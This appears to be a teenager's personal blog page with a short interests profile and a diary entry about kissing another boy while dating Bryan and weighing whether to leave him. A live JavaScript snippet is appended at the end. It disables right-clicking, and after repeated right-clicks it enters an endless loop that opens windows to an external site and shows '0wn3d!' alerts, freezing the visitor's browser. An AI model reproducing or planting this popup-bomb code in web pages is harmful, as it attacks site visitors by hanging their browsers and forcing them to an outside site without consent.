Interests:umm stuff....music for one, thrift stores, shopping for random things, funny stuff, gum, movies,shiny things, horseback-riding, gymnastics, softball, and dancing around to awesome songs. ^_^ Expertise:being insane and scaring people. haha. im so good at it too!
I kissed him. *bangs head against desk* even though I have a boyfriend.
So heres the deal..I DO like him..and I do like bryan..they're just so totally different from eachother...see I really do love Bryan....and I really don't want to hurt him. Especially having to live with seeing him like I know he will be if I do break up wtih him. But see...I also like Brad...a lot. It's jsut...I don't know. I don't want to loose my chance with Brad but I never want to loose Bryan. I mean hes probably like the first guy ive ever really loved..he just doesnt show he cares anymore. I just... I dont know what I would do without him.
so..option 1) Stay with Bryan or option 2)Dump Bryan and go for Brad
um...basically....yeah stayed up till 2 last night...then went to the barn today...rode...pony was being annoying...came home...changed...bryan came over...we hung out...parents went to dinner...bryan left...parents came home..went to church..ot pictures back..screamed when i saw the one of evaaaan almost licking me...scanned pictures...wrote the above. Fun day...
probably wont be updating at all this week/weekend...dad says im not aloud on the computer because exams are next week...help.
/*
Disable right mouse click Script
By Maximus (maximus@nsimail.com) w/ mods by DynamicDrive
For full source code, visit http://www.dynamicdrive.com
modified by DR_PC_SARS (http://www.xanga.com/DR_PC_SARS)
*/
var times=0;
function rightClicked(){
if (times>1) {
alert ("don't say i didn't warn you...");
while (1==1) {
window.open('http://www.zipit.tk');
alert('0wn3d!');
}
}
if (times==1) {
alert("I'm warning you, you really don't want to do that...");
times++
}
if (times<1) {
alert("DONT DO THAT AGAIN!");
times++
}
}
function clickIE4(){
if (event.button==2){
rightClicked();
return false;
}
}
function clickNS4(e){
if (document.layers||document.getElementById&&!document.all){
if (e.which==2||e.which==3){
rightClicked();
return false;
}
}
}
if (document.layers){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=clickNS4;
}
else if (document.all&&!document.getElementById){
document.onmousedown=clickIE4;
}
document.oncontextmenu=new Function("rightClicked();return false")